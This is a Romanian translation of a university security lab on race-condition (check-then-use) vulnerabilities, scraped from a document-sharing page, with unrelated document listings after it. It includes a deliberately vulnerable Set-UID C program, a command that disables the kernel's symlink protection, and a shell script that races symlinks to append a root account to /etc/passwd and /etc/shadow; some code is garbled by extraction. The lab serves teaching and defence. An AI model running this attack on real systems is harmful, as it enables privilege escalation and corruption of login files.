Laboratory for Computer Security Education 1 Vulnerabilitatea datorată concurenței Copyright Wenliang Du, Syracuse University. The developme

Mărimea: px
Porniți afișarea la pagina:

Download "Laboratory for Computer Security Education 1 Vulnerabilitatea datorată concurenței Copyright Wenliang Du, Syracuse University. The developme"

Transcriere

1 Laboratory for Computer Security Education 1 Vulnerabilitatea datorată concurenței Copyright Wenliang Du, Syracuse University. The development of this document is/was funded by three grants from the US National Science Foundation: Awards No and from TUES/CCLI and Award No from Trustworthy Computing. Permission is granted to copy, distribute and/or modify this document under the terms of the GNU Free Documentation License, Version 1.2 or any later version published by the Free Software Foundation. A copy of the license can be found at 1 Scopul laboratorului Obiectivul acestui laborator este ca studenții să câștige experiență nemijlocită asupra vulnerabilității datorate concurenței punând în practică ce au învățat despre vulnerabilitate. Situația de concurență apare atunci când mai multe procese accesează și manipulează aceleași date concurent, iar rezultatul execuției depinde de ordinea în care are loc accesul. Dacă un program privilegiat este vulnerabil la concurență, atunci atacatorii pot executa un proces paralel care să concureze cu programul privilegiat, cu intenția de a schimba comportamentul programului. În acest laborator, studenților li se dă un program care să aibă vulnerabilitatea datorată concurenței; sarcina lor este să dezvolte o schemă de exploatare a acestei vulnerabilități și să obțină privilegii de supervizor (root). Pe lângă atacuri, studenții vor ghidați să parcurgă câteva scheme de protecție care pot folosite la contracararea atacurilor care exploatează vulnerabilitatea datorată concurenței. Studenții trebuie să evalueze dacă schemele elaborate funcționează sau nu și să explice de ce. 2 Desfășurarea laboratorului 2.1 Setarea inițială Sarcinile de laborator se pot executa pe mașinile virtuale Ubuntu pre-construite. Pentru mașina Ubuntu 9.11 VM, acest setup poate ignorat. Pentru mașinile virtuale Ubuntu VM, trebuie să citiți cele ce urmează. Ubuntu se livrează cu un mecanism de protecție construit în sistem care să protejeze mașina de atacurile bazate pe concurență. Schema de protecție folosită funcționează pe baza restrângerii dreptului de a urma o legătură simbolică (symlink). Potrivit documentației, legăturile simbolice în directoarele cu bitul SUID setat și care pot scrise de toți (d.e. /tmp) nu pot urmate dacă cel care dorește să urmeze legătura și proprietarul directorului nu se potrivesc cu proprietarul legăturii simbolice. În acest laborator, avem nevoie să dezactivăm aceasta protecție. Acest lucru se poate realiza folosind comanda următoare: $ sudo sysctl -w kernel.yama.protected_sticky_symlinks=0 2.2 Un program vulnerabil Programul care urmează este în aparență un program inofensiv. Însă acesta conține o vulnerabilitate datorată concurenței. /* vulp.c */ #include <stdio.h> #include <unistd.h>

2 Laboratory for Computer Security Education 2 #include <string.h> #include <limits.h> #dene DELAY LONG_MAX / 100 int main() { char *fn = "/tmp/xyz"; char buffer[256]; FILE *fp; /* get user input */ scanf("%255[ˆ\n]", buffer ); if(!access(fn, W_OK)) { /* simulating delay */ for (long int i = 0; i < DELAY; i++) { long int a = iˆ2; a *= i; fp = fopen(fn, "a+"); fwrite("\n", sizeof(char), 1, fp); fwrite(buffer, sizeof(char), strlen(buffer), fp); fflush(fp); fclose(fp); return 0; else { printf("no permission \n"); fflush(stdout); return 1; Acesta este un program Set-UID (al cărui proprietar este root); programul adaugă un șir la ceea ce introduce utilizatorul la sfârșitul unui șier temporar /tmp/xyz. De vreme ce codul rulează cu privilegii de root, el verică cu grijă dacă utilizatorul real are de fapt permisiunea de acces la șierul /tmp/xyz; acesta este scopul apelului access(). O dată ce programul s-a asigurat că utilizatorul real are într-adevăr dreptul, programul deschide șierul și scrie în șier ceea ce introduce utilizatorul. La prima vedere, se pare că programul nu are nici o problemă. Totuși, există o vulnerabilitate datorată concurenței în acest program: din cauza ferestrei de timp (întârzierea simulată) dintre vericare (access) și folosire (fopen), există posibilitatea ca șierul folosit de access să e diferit de șierul folosit de fopen, chiar dacă ambele au același nume de șier /tmp/xyz. Dacă un atacator rău intenționat poate cumva să facă /tmp/xyz să e o legătura simbolică, legătură care indică spre /etc/shadow, atunci atacatorul poate face ca ceea ce introduce utilizatorul să e adăugat la /etc/shadow (observați că programul rulează cu privilegii de root și, din acest motiv, poate suprascrie orice șier). 2.3 Sarcina 1: Exploatarea vulnerabilităților datorate concurenței Trebuie să exploatați vulnerabilitatea datorată concurenței din programul Set-UID anterior. Mai clar, trebuie să realizați următoarele: 1. Să suprascrieți orice șier care aparține lui root.

3 Laboratory for Computer Security Education 3 2. Să obțineți privilegii de root; mai precis să puteți face orice poate face root. 2.4 Sarcina 2: Mecanismul de protecție A: Repetarea Nu e ușor să scapi de situațiile de concurență, deoarece șablonul verică-și-folosește este necesar frecvent în programe. În loc să înlăturăm situațiile de concurență, putem adăuga altele, astfel încât pentru a compromite securitatea unui program atacatorii să e nevoiți să câștige în toate aceste situații de concurență. Dacă situațiile sunt proiectate corespunzător, atunci putem reduce exponențial probabilitatea ca atacatorii să câștige. Ideea de bază este să repetăm access() și open() de câteva ori; de ecare dată când deschidem șierul și la sfârșit vericăm dacă s-a deschis același șier prin vericarea i-nodes lor (ar trebui sa e aceleași). Folosiți această strategie pentru modicarea programului vulnerabil și repetați atacul. Raportați cât de greu este să reușești dacă mai puteți reuși. 2.5 Sarcina 3: Mecanismul de protecție B: Principiul privilegiului minim Problema fundamentală a programului vulnerabil este violarea Principiului privilegiului minim. Programatorul înțelege că utilizatorul care rulează programul ar putea avea puteri prea mari, așa că el/ea a introdus apelul access() pentru a limita puterea utilizatorului. Cu toate acestea, nu aceasta este abordarea corespunzătoare. O abordare mai bună este să aplice Principiul privilegiului minim; mai precis, dacă un utilizator nu are nevoie de un anumit privilegiu, privilegiul respectiv trebuie dezactivat. Puteți folosi apelul sistem seteuid pentru a dezactiva temporar privilegiul de root și apoi să-l reactivați dacă este nevoie. Folosiți această abordare pentru a elimina vulnerabilitatea din program și apoi repetați-vă atacul. Veți putea reuși? Raportați observațiile și explicația. 2.6 Sarcina 4: Mecanismul de protecție C: Schema construită în Ubuntu Această sarcină este doar pentru Ubuntu VM. Cum am menționat în setarea inițială Ubuntu vine cu o schemă construită în sistem pentru protecția împotriva atacurilor bazate pe concurență. În cadrul acestei sarcini trebuie să reactivați protecția folosind comanda: $ sudo sysctl -w kernel.yama.protected_sticky_symlinks=1 Descrieți-vă observațiile în raport și explicați următoarele: 1. De ce funcționează aceasta schemă de protecție? 2. Este o schemă bună? De ce sau de ce nu? 3. Care sunt limitările acestei scheme? 3 Ghid pentru atac 3.1 Două ținte potențiale Sunt mai multe căi de exploatare a vulnerabilității datorate concurenței în vulp.c. O cale este folosirea vulnerabilității pentru a adăuga informație atât în /etc/passwd cât și în /etc/shadow. Aceste două șiere sunt folosite de sistemele de operare Unix la autenticarea utilizatorilor. Dacă atacatorii pot adăuga informație la aceste două șiere, atunci au puterea să creeze noi utilizatori inclusiv supervizori (punând UID zero).

4 Laboratory for Computer Security Education 4 Fișierul /etc/passwd reprezinta baza de date de autenticare pentru o mașină Unix. Acesta conține atributele de baza ale utilizatorului. Este un șier ASCII care conține o intrare pentru ecare utilizator. Fiecare intrare denește atributele de bază aplicate utilizatorului. Atunci când se folosește comanda mkuser pentru a adăuga utilizatori la sistem, comanda actualizează șierul /etc/passwd. Fișierul /etc/passwd trebuie să poată citit de toată lumea, deoarece multe programe au nevoie să acceseze atributele utilizatorilor, atribute cum sunt: numele de utilizator, directorul de casă etc. Salvarea criptată a unei parole în acel șier ar însemna că oricine are acces la mașină ar putea folosi programe de spart parole (cum este crack) pentru a sparge conturile altora. Pentru a rezolva această problemă s-a creat șierul de parole shadow (umbră). Fișierul /etc/passwd din sistemul shadow poate citit de toți, dar nu conține parole cifrate. Un alt șier, /etc/shadow, care poate citit doar de root conține parolele. Pentru a afla ce șiruri să adaugați la aceste șiere, executați mkuser și vedeți ce se adaugă la aceste șiere. Spre exemplu, cele ce urmează arată ce s-a adăugat la aceste șiere după crearea unui nou utilizator numit smith cu parola : /etc/passwd: smith:x:1001:1002:smith,added by seed,,:/home/smith:/bin/bash /etc/shadow: smith:$6$kuvicknb$vpq/p.dlbdqq4npoyfhbvmbavdt9a/9accbqx4nm2dcqqmulbpaahmuy6mhuenkpj/yz5fgzdvrx Cea de a treia coloană din șierul /etc/passwd conține UID al utilizatorului. Deoarece contul smith este un cont obișnuit, valoarea de UID 1000 nu are semnicație specială. Dacă schimbăm valoarea acestei intrări la 0, smith devine root. 3.2 Crearea legăturilor simbolice Puteți crea manual legături simbolice folosind comanda "ln -s". Puteți face asta și din C apelând funcția symlink, pentru a crea legături simbolice din program. Cum Linux nu permite cuiva să creeze o legătură care există, ea trebuie mai întâi ștearsă. Următorul fragment de cod C arată cum se șterge o legătură simbolică și apoi cum să se facă /tmp/xyz să indice spre /etc/passwd: unlink("/tmp/xyz"); symlink("/etc/passwd","/tmp/xyz"); 3.3 Îmbunătățirea ratei de succes Pasul cel mai critic (adică indicare spre șierul nostru țintă) dintr-un atac în situație de concurență trebuie să apară în fereastra dintre vericare și folosire; mai precis între apelurile access și fopen din vulp.c. Cum nu putem modica programul vulnerabil, singurul lucru pe care îl putem face este să rulăm programul nostru de atac în paralel cu programul țintă, în speranța că modicarea legăturii va avea loc în fereastra de timp critică. Din nefericire, nu putem obține o temporizare perfectă. Din acest motiv, succesul atacului este probabilistic. Probabilitatea unui atac reușit poate destul de redusă dacă fereastra este mică. Trebuie să vă gândiți cum să creșteți probabilitatea. (Sugestii: puteți rula programul vulnerabil de mai multe ori; aveți nevoie doar de un succes în aceste încercări).

5 Laboratory for Computer Security Education 5 Cum aveți nevoie să rulați atacurile și programul de multe ori, trebuie să scrieți un program care sa automatizeze procesul de atac. Pentru a evita să tastați manual intrarea lui vulp, puteți folosi redirectarea. Mai precis, scrieți intrarea într-un șier și apoi redirectați acest șier la rularea lui vulp. De exemplu, puteți folosi: vulp < FILE. În programul vulp.c, am adăugat intenționat parametrul DELAY. Acesta este menit sa ușureze atacul. O dată ce ați reușit în atacuri, reduceți gradual valoarea parametrului DELAY. Când DELAY ajunge la zero, cu cât mai mult vă ia să reușiți? 3.4 Cum știți dacă atacul a reușit De vreme ce utilizatorul nu are permisiunea de acces în citire la /etc/shadow, nu este vreo cale de a ști dacă a fost modicat. Singura cale de a afla o constituie mărcile de timp. De asemenea, ar mai bine dacă am opri atacul de îndată ce am adăugat intrări în respectivul șier. Scenariul următor pentru procesorul de comenzi verica dacă mărcile de timp ale lui /etc/shadow s-au schimbat. Tipărește un mesaj de îndată ce se observă o modicare. #!/bin/sh old= ls -l /etc/shadow while [ "$old" = "$new" ] do done echo "STOP... The shadow le has been changed" Pentru a putea simula execuția paralelă a programului vulnerabil și a modicărilor atacatorului puteți folosi o versiune modicată a script-ului anterior, check.sh, mai precis: #!/bin/sh usage (){ echo "Uses race condition to change user database (passwd, shadow) les" echo "Usage $0 [all shadow passwd]" exit 1 if [ -z $1 ]; then usage if [ "$1" = "all" -o "$1" = "shadow" ]; then echo smith:x:1001:1002:smith,new,,:/home/smith:/bin/bash > ADD2PASSWD echo smith:$6$kuvicknb$vpq/p.dlbdqq4npoyfhbvmbavdt9a/\ 9AcCBQx4nM2dCqQMUlBpAaHmUY6mHuenkpJ/yZ5FGZDvRx4ECRjed3L.:\ 15810:0:99999:7::: > ADD2SHADOW old= ls -l /etc/shadow echo Trying to add info to /etc/shadow line: cat ADD2SHADOW while [ "$old" = "$new" ] do sudo rm /tmp/xyz && touch /tmp/xyz echo -n../vulp < ADD2SHADOW & # put vulp in background

6 Laboratory for Computer Security Education 6 ln -sf /etc/shadow /tmp/xyz && sync done sudo killall vulp echo " done... The shadow le has been changed" if [ $1 = "shadow" ]; then exit 0; sleep 1 if [ "$1" = "all" -o "$1" = "passwd" ]; then echo echo Trying to add info to /etc/passwd line: cat ADD2PASSWD old= ls -l /etc/passwd new= ls -l /etc/passwd while [ "$old" = "$new" ] do sudo rm /tmp/xyz && touch /tmp/xyz echo -n../vulp < ADD2PASSWD & # put vulp in background ln -sf /etc/passwd /tmp/xyz && sync new= ls -l /etc/passwd done sudo killall vulp echo " done... The passwd le has been changed" else usage 3.5 Depanarea Pe parcursul testării programului, din cauza terminării forțate nesincronizate a programului de atac, /tmp/xyz poate ajunge într-o stare instabilă. Când se întâmplă acest lucru, SO îl face automat șier normal cu proprietar root. Dacă se întâmplă așa, șierul trebuie șters sudo rm /tmp/xyz și atacul trebuie repornit. 3.6 Alte programe shell utile Crearea executabilului vulnerabil, mkvulp.sh: #!/bin/bash gcc -std=gnu99 -o vulp vulp.c sudo chown root:root vulp sudo chmod u+s vulp Salvarea save.sh și refacerea restore.sh șierelor /etc/shadow și /etc/passwd: #!/bin/bash echo Save /etc/passwd and /etc/shadow pwd cp /etc/shadow shadow cp /etc/passwd passwd

7 Laboratory for Computer Security Education 7 #!/bin/bash echo Restore /etc/shadow and /etc/passwd from pwd. Delete /tmp/xyz sudo rm -f /tmp/xyz sudo cp shadow /etc/shadow sudo cp passwd /etc/passwd 3.7 Avertisment În trecut, unii studenți au golit accidental șierul /etc/shadow în timpul atacurilor (nu știm încă de ce s-a întâmplat). Dacă pierdeți șierul /etc/shadow nu mai puteți să vă logați. Pentru a evita aceasta situație, faceți o copie a șierului original.

Laborator 1 suport teoretic Mediul de dezvoltare Eclipse GLOSAR - Aplicaţie: program obţinut în urma aplicării operației BUILD asupra unui proiect (ve

Laborator 1 suport teoretic Mediul de dezvoltare Eclipse GLOSAR - Aplicaţie: program obţinut în urma aplicării operației BUILD asupra unui proiect (ve Laborator 1 suport teoretic Mediul de dezvoltare Eclipse GLOSAR - Aplicaţie: program obţinut în urma aplicării operației BUILD asupra unui proiect (vezi Program C) - BUILD: operație complexă prin care

Mai mult

AcadNet Etapa Naţională Secțiunea calculatoare, clasele Citiți cu atenție toate subiectele înainte de a începe rezolvarea. Aveți 15 minut

AcadNet Etapa Naţională Secțiunea calculatoare, clasele Citiți cu atenție toate subiectele înainte de a începe rezolvarea. Aveți 15 minut Secțiunea calculatoare, clasele 11-12 Citiți cu atenție toate subiectele înainte de a începe rezolvarea. Aveți 15 minute să adresați întrebări pentru clarificări înainte de a contoriza timpul de rezolvare

Mai mult

Testare manuala: situatia in care o persoana initiaza fiecare test, interactioneaza cu el si interpreteaza, analizeaza si raporteaza rezultatele. Test

Testare manuala: situatia in care o persoana initiaza fiecare test, interactioneaza cu el si interpreteaza, analizeaza si raporteaza rezultatele. Test Testare manuala: situatia in care o persoana initiaza fiecare test, interactioneaza cu el si interpreteaza, analizeaza si raporteaza rezultatele. Testare automata: exista un mecanism pentru executia fara

Mai mult

Lab6LCD

Lab6LCD LABORATOR 6 - Interfaţă pentru afişor cu cristale lichide (LCD), partea II-a Scopul lucrării În laboratorul anterior s-au implementat funcţiile rd_lcdreg(char vrs), wr_lcdreg(char vrs, char data), void

Mai mult

2

2 5 Packet Tracer Configurarea Switch-urilor și a Routerelor Topologia: Tabelul de adrese: Dispozitiv Interfața Adresa IP Subnet Mask Default Gateway R1 Fa0/0 192.168.1.1 255.255.255.0 Serial2/0 10.10.10.1

Mai mult

Curs 4 - Drepturi. Limitarea drepturilor. Monitorizare

Curs 4 - Drepturi. Limitarea drepturilor. Monitorizare Curs 4 Drepturi. Limitarea drepturilor. Monitorizare Gestiunea Serviciilor de Rețea 27 octombrie 2011 GSR Curs 4, Drepturi. Limitarea drepturilor. Monitorizare 1/42 Moto The user s going to pick dancing

Mai mult

Microsoft Word - cap2.2.UNIX-NOS.doc

Microsoft Word - cap2.2.UNIX-NOS.doc 2.2. UNIX-NOS Conf. Dr. Carmen Timofte NOS= Network Operating System sistem de operare de reţea 1. Conectarea la un server de Unix situat la distanţa (în reţea) 2. Cum se conecteaza la reţea? 3. Ce trebuie

Mai mult

Laborator 3

Laborator 3 Laborator 3 Programare III săptămâna 8-12.10.2018 OBIECTIVE: - Folosirea modificatorilor unei clase (public, abstract, final) - Folosirea modificatorilor de acces în declaraţiile membrilor unei clase Noţiuni:

Mai mult

Microsoft Word - Curs_07.doc

Microsoft Word - Curs_07.doc 5.3 Modificarea datelor în SQL Pentru modificarea conţinutului unei baze de date SQL pune la dispoziţie instrucţiunile insert, delete şi update. 5.3.1 Inserări în baza de date Sintaxa instrucţiunii insert

Mai mult

Interfețe și Protocoale de Comunicații Arduino-Port Paralel Arduino. Laborator 1- Portul Paralel 1 Caracteristici generale Arduino UNO este o placă de

Interfețe și Protocoale de Comunicații Arduino-Port Paralel Arduino. Laborator 1- Portul Paralel 1 Caracteristici generale Arduino UNO este o placă de Arduino. Laborator 1- Portul Paralel 1 Caracteristici generale Arduino UNO este o placă de dezvoltare bazată pe un microcontroller ATmega 328P pe 8 biți cu 32kB memorie flash. Placa de dezvoltare conține:

Mai mult

Limbaje de Programare Curs 8 – Fisiere

Limbaje de Programare   Curs 8 – Fisiere Limbaje de Programare Curs 8 Fişiere Dr. Casandra Holotescu Universitatea Politehnica Timişoara Ce discutăm azi... 1 Lucrul cu fişiere 2 Fişiere de tip text 3 Funcţii pentru cazuri de eroare 4 Fişiere

Mai mult

Utilizarea Internetului in Afaceri FSEGA, UBB Lect.univ.dr. Daniel Mican LABORATOR 3. Achizitionarea domeniilor web si a

Utilizarea Internetului in Afaceri FSEGA, UBB Lect.univ.dr. Daniel Mican LABORATOR 3. Achizitionarea domeniilor web si a LABORATOR 3. Achizitionarea domeniilor web si a serviciilor de webhosting, respectiv gestionarea acestora prin intermediul cpanel PREZENTAREA LUCRARII DE LABORATOR Lucrarea de laborator isi propune sa

Mai mult

Manual de utilizare Room Booking System

Manual de utilizare Room Booking System Manual de utilizare Room Booking System Cuprins 1. Autentificare 2. Utilizare aplicatie 2.1. Manage Reservation 2.2. Rooms 2.3. Manage Users 2.4. View Reservations 3. Sectiuni Adaugare/Editare 3.1 Adauga

Mai mult

PowerPoint Presentation

PowerPoint Presentation Utilizarea Office 365 pe telefonul Android Ghid de pornire rapidă Verificarea e-mailului Configurați telefonul Android pentru a trimite și a primi e-mailuri din contul dvs. Office 365. Verificarea calendarului

Mai mult

Microsoft Word - 2 ES RO.doc

Microsoft Word - 2 ES RO.doc 2 MULTITASKING 2.1. Preliminarii Este deja foarte bine cunoscut faptul că o programare eficientă în domeniul sistemelor în timp real, în mod evident, vizând aici sistemele în timp real încorporate, este

Mai mult

Laborator 9: Fire de execuţie Întocmit de: Adina Neculai Îndrumător: Asist. Drd. Gabriel Danciu 20 noiembrie 2011

Laborator 9: Fire de execuţie Întocmit de: Adina Neculai Îndrumător: Asist. Drd. Gabriel Danciu 20 noiembrie 2011 Laborator 9: Fire de execuţie Întocmit de: Adina Neculai Îndrumător: Asist. Drd. Gabriel Danciu 20 noiembrie 2011 I. NOŢIUNI TEORETICE A. Ce este un fir de execuţie? Înainte de a defini conceptul de fir

Mai mult

Microsoft Word - CarteC.doc

Microsoft Word - CarteC.doc Transmiterea parametrilor unei funcții Parametrii se transmit de la funcţia apelantă la funcţia apelată prin intermediul stivei. La apelul unei funcţii, pe stivă se crează o înregistrare de activare, care

Mai mult

RainbowCrack Rodocea Madalina Grupa Martie 2016

RainbowCrack Rodocea Madalina Grupa Martie 2016 RainbowCrack Rodocea Madalina Grupa 7234 9 Martie 2016 Cuprins 1 RainbowCrack 3 1.1 Descriere...................................... 3 1.2 Instalare RainbowCrack............................. 3 1.3 Utilizare......................................

Mai mult

Microsoft PowerPoint - 11_USO_curs_08.ppt [Compatibility Mode]

Microsoft PowerPoint - 11_USO_curs_08.ppt [Compatibility Mode] Cursul 8 8 Recapitulare 21 noiembrie 2011 Moto Repetitio mater studiorum est. 21.11.2011 2 Compilare și execuție cod sursă preprocesor (GNU CPP) gcc -E cod preprocesat cod preprocesat compilator (GCC)

Mai mult

Inserarea culorilor in tabele

Inserarea culorilor in tabele Prezentarea aplicaţiei Macromedia Dreamweaver http://ro.wikipedia.org/wiki/dreamweaver Macromedia Dreamweaver este o unealtă destinată creatorilor de pagini web. Dreamweaver a fost creat de Macromedia

Mai mult

LABORATOR 1. Stocarea si partajarea fisierelor online cu ajutorul Dropbox, WeTransfer.com PREZENTAREA LUCRĂRII DE LABORATOR Lucrarea de laborator îşi

LABORATOR 1. Stocarea si partajarea fisierelor online cu ajutorul Dropbox, WeTransfer.com PREZENTAREA LUCRĂRII DE LABORATOR Lucrarea de laborator îşi LABORATOR 1. Stocarea si partajarea fisierelor online cu ajutorul Dropbox, WeTransfer.com PREZENTAREA LUCRĂRII DE LABORATOR Lucrarea de laborator îşi propune să prezinte modul de utilizare a instrumentului

Mai mult

1. Operatii cu matrici 1 Cerinte: Sa se realizeze functii pentru operatii cu matrici patratice (de dimensiune maxima 10x10). Operatiile cerute sunt: A

1. Operatii cu matrici 1 Cerinte: Sa se realizeze functii pentru operatii cu matrici patratice (de dimensiune maxima 10x10). Operatiile cerute sunt: A 1. Operatii cu matrici 1 Sa se realizeze functii pentru operatii cu matrici patratice (de dimensiune maxima 10x10). Operatiile cerute sunt: A+B (adunare), aa (inmultire cu scalar), A-B scadere), AT (Transpusa),

Mai mult

EXCEL FĂRĂ SECRETE Grafice şi diagrame

EXCEL FĂRĂ SECRETE Grafice şi diagrame EXCEL FĂRĂ SECRETE Grafice şi diagrame Cuprins 1. Introducere... 3 2. Crearea graficelor în Excel... 3 3. Mutarea şi copierea graficelor... 11 2 EXCEL FĂRĂ SECRETE- Grafice şi diagrame 1. Introducere Informaţiile

Mai mult

PHP (II)

PHP (II) PHP şi MySQL Bazele de date sunt colecţii de date, aranjate într-o anumită formă Operaţii : - Crearea bazei de date; - Conectarea la baza de date; - Inserarea datelor in baza de date; - Ștergerea datelor

Mai mult

Ch

Ch Numai pentru uz academic EDK Laborator 4-5 Adăugarea modulelor IP la un proiect hardware Laborator 2: Adăugarea modulelor IP la un proiect hardware Introducere Obiective Acest laborator prezintă procesul

Mai mult

Textul si imaginile din acest document sunt licentiate Attribution-NonCommercial-NoDerivs CC BY-NC-ND Codul sursa din acest document este licentiat Pu

Textul si imaginile din acest document sunt licentiate Attribution-NonCommercial-NoDerivs CC BY-NC-ND Codul sursa din acest document este licentiat Pu Textul si imaginile din acest document sunt licentiate Attribution-NonCommercial-NoDerivs CC BY-NC-ND Codul sursa din acest document este licentiat Public-Domain Esti liber sa distribui acest document

Mai mult

Laborator - Configurarea Rutelor IPv4 Statice și Implicite Topologie Tabela de Adresare Echipame nt Interfață Adresă IP Masca de subreţea Default Gate

Laborator - Configurarea Rutelor IPv4 Statice și Implicite Topologie Tabela de Adresare Echipame nt Interfață Adresă IP Masca de subreţea Default Gate Topologie Tabela de Adresare Echipame nt Interfață Adresă IP Masca de subreţea Default Gateway Obiective R1 G0/1 192.168.0.1 255.255.255.0 N/A S0/0/1 10.1.1.1 255.255.255.252 N/A R3 G0/1 192.168.1.1 255.255.255.0

Mai mult

Ghid de utilizare pentru Platforma E-Admitere intranet.inj.md

Ghid de utilizare pentru Platforma E-Admitere intranet.inj.md Ghid de utilizare pentru Platforma E-Admitere intranet.inj.md Cuprins 1. CREARE DE CONT ȘI AUTENTIFICARE PE PLATFORMĂ... 4 2. INTERFAȚA PLATFORMEI E-ADMITERE... 9 2.1 PRIMA PAGINĂ... 9 2.2 DOSAR CURENT...

Mai mult

Cursul 10 - Shell scripting

Cursul 10 - Shell scripting Cursul 10 Shell scripting Utilizarea Sistemelor de Operare (USO) 16 decembrie 2016 Automatica si Calculatoare Cursul 10, Shell scripting 1/42 Moto Some people, when confronted with a problem, think I know,

Mai mult

Cursul 10 - Shell scripting

Cursul 10 - Shell scripting Cursul 10 Shell scripting Utilizarea Sistemelor de Operare (USO) 16 decembrie 2016 Automatica si Calculatoare Cursul 10, Shell scripting 1/42 Moto Some people, when confronted with a problem, think I know,

Mai mult

1. Depistarea setarilor de retea necesare Primul pas pentru introducerea in retea a DVR-ului este determinarea setarilor de retea cu care lucreaza ret

1. Depistarea setarilor de retea necesare Primul pas pentru introducerea in retea a DVR-ului este determinarea setarilor de retea cu care lucreaza ret 1. Depistarea setarilor de retea necesare Primul pas pentru introducerea in retea a DVR-ului este determinarea setarilor de retea cu care lucreaza reteaua dumneavoastra. Trebuie sa aflam ce tipuri de adrese

Mai mult

INTREBARI FRECVENTE SI MANUAL DE UTILIZARE hub.sendsms.ro

INTREBARI FRECVENTE SI MANUAL DE UTILIZARE hub.sendsms.ro INTREBARI FRECVENTE SI MANUAL DE UTILIZARE hub.sendsms.ro 1. Cum pot trimite un singur mesaj? Odata logat in aplicatie cu username ul si parola oferita intrati in menu la sectiunea Dashboard si apoi selectati

Mai mult

Lanțul de aprovizionare E.ON Ghidul furnizorului Instrucțiuni pas cu pas

Lanțul de aprovizionare E.ON Ghidul furnizorului Instrucțiuni pas cu pas Lanțul de aprovizionare E.ON 15.11.2018 Ghidul furnizorului Instrucțiuni pas cu pas Introducere Stimate furnizor, Pentru a maximiza valoarea interacțiunii cu furnizorii și pentru a asigura transparența

Mai mult

Addendum Syllabus 6 Microsoft Access 2016 REF Syllabus 6.0 Cunoașterea domeniilor în care se utilizează bazele de date Datorită potenţialului ma

Addendum Syllabus 6 Microsoft Access 2016 REF Syllabus 6.0 Cunoașterea domeniilor în care se utilizează bazele de date Datorită potenţialului ma REF 1.1.5 Syllabus 6.0 Cunoașterea domeniilor în care se utilizează bazele de date Datorită potenţialului mare de eficientizare a muncii, bazele de date îşi găsesc aplicaţii în diverse domenii: - transporturi

Mai mult

Limbaje de programare Pointeri. Alocare dinamică (continuare) 26 noiembrie 2012

Limbaje de programare Pointeri. Alocare dinamică (continuare) 26 noiembrie 2012 Limbaje de programare Pointeri. Alocare dinamică (continuare) 26 noiembrie 2012 EROARE: lipsa iniţializării E o EROARE să folosim o variabilă neiniţializată int sum; for (i=0; i++ < 10; ) sum += a[i];

Mai mult

Informație și comunicare

Informație și comunicare 3.1. Folosirea unui motor de căutare Alegerea unui motor de căutare Motorul de căutare este un program disponibil pe internet cu ajutorul căruia se pot căuta diferite informații. Această căutare se realizează

Mai mult

PowerPoint Presentation

PowerPoint Presentation Auto Id Middleware Preocupă-te de nevoile tale de business, de tehnologie ne ocupăm noi! Vrei să integrezi RFID și alte echipamente Auto Id în procesele tale de business? Concentrează-te pe logica de aplicație

Mai mult

Информационная система персонализации, печати и учета документов об образовании

Информационная система персонализации, печати и учета документов об образовании Sistemul Informaţional Personalizare a Actelor de Studii (SIPAS) 2018-2019 Contacte http://www.ctice.md:8088/gimnaziul Telefon : (022) 44-32-37 actedestudii@ctice.gov.md Conţinutul 1 2 3 4 Locul de muncă

Mai mult

Laborator 2 Incompatibilităţi/Diferenţe între C şi C++ Completări C++ Supraîncărcarea (redefinirea) numelui de funcţii În C nu este permisă existenţa

Laborator 2 Incompatibilităţi/Diferenţe între C şi C++ Completări C++ Supraîncărcarea (redefinirea) numelui de funcţii În C nu este permisă existenţa Laborator 2 Incompatibilităţi/Diferenţe între C şi C++ Completări C++ Supraîncărcarea (redefinirea) numelui de funcţii În C nu este permisă existenţa a două funcţii care au acelaşi nume În C++ acest lucru

Mai mult

Caraivan George-Alexandru Grupa 431A Interfața driver-kernel la Linux Introducere Deși pentru unii dintre noi acest lucru poate fi o supriză, cei mai

Caraivan George-Alexandru Grupa 431A Interfața driver-kernel la Linux Introducere Deși pentru unii dintre noi acest lucru poate fi o supriză, cei mai Caraivan George-Alexandru Grupa 431A Interfața driver-kernel la Linux Introducere Deși pentru unii dintre noi acest lucru poate fi o supriză, cei mai specializați dintre noi în domeniul calculatoarelor

Mai mult

Laborator - Proiectarea și Implementarea Adresării cu VLSM Topologie Obiective Partea 1: Examinați Cerințele Rețelei Partea 2: Proiectați Schema Adres

Laborator - Proiectarea și Implementarea Adresării cu VLSM Topologie Obiective Partea 1: Examinați Cerințele Rețelei Partea 2: Proiectați Schema Adres Topologie Obiective Partea 1: Examinați Cerințele Rețelei Partea 2: Proiectați Schema Adresei VLSM Partea 3: Cablați și Configurați Rețeaua IPv4 Context/Scenariu Variable Length Subnet Mask (VLSM) a fost

Mai mult

Curs 3 Permutari cu repetitie. Combinari. Algoritmi de ordonare si generare

Curs 3  Permutari cu repetitie. Combinari.  Algoritmi de ordonare si generare Curs 3 Permutări cu repetiţie. Combinări. Algoritmi de ordonare şi generare Octombrie 2015 Cuprins Algoritmi de ordonare şi generare pentru permutări cu repetiţie Reprezentarea binară a submulţimilor Algoritmi

Mai mult

Analiză statică Analiza fluxului de date 23 octombrie 2014

Analiză statică Analiza fluxului de date 23 octombrie 2014 Analiză statică Analiza fluxului de date 23 octombrie 2014 Analiză statică: definiție O analiză a codului sursă (fără a executa programul), cu scopul de a determina proprietăți ale programului sursă. (in

Mai mult

Limbaje de Programare Curs 6 – Functii de intrare-iesire

Limbaje de Programare   Curs 6 – Functii de intrare-iesire Limbaje de Programare Curs 6 Funcţii de intrare-ieşire Dr. Casandra Holotescu Universitatea Politehnica Timişoara Ce discutăm azi... 1 Citire formatată 2 Citirea şirurilor de caractere 3 Citirea unor linii

Mai mult

PowerPoint Presentation

PowerPoint Presentation Recuperarea datelor 5 Recuperarea datelor şi ACID Atomicitatea garantată prin refacerea efectului acţiunilor corespunzătoare tranzacţiilor necomise. Durabilitea garantată prin asigurarea faptului că toate

Mai mult

tehnologii web

tehnologii web Universitatea Constantin Brâncuşi din Târgu-Jiu Facultatea de Inginerie Departamentul de Automatică, Energie şi Mediu Tehnologii Web Lector univ. dr. Adrian Runceanu 1 Curs 7 Limbajul PHP (partea II) 2

Mai mult

R E G U L A M E N T U L privind utilizarea Sistemului Informațional Automatizat Acreditare (SIA Acreditare) în cadrul Centrului Național de Acreditare

R E G U L A M E N T U L privind utilizarea Sistemului Informațional Automatizat Acreditare (SIA Acreditare) în cadrul Centrului Național de Acreditare R E G U L A M E N T U L privind utilizarea Sistemului Informațional Automatizat Acreditare (SIA Acreditare) în cadrul Centrului Național de Acreditare din Republica Moldova MOLDAC. CUPRINS 1. Destinaţia

Mai mult

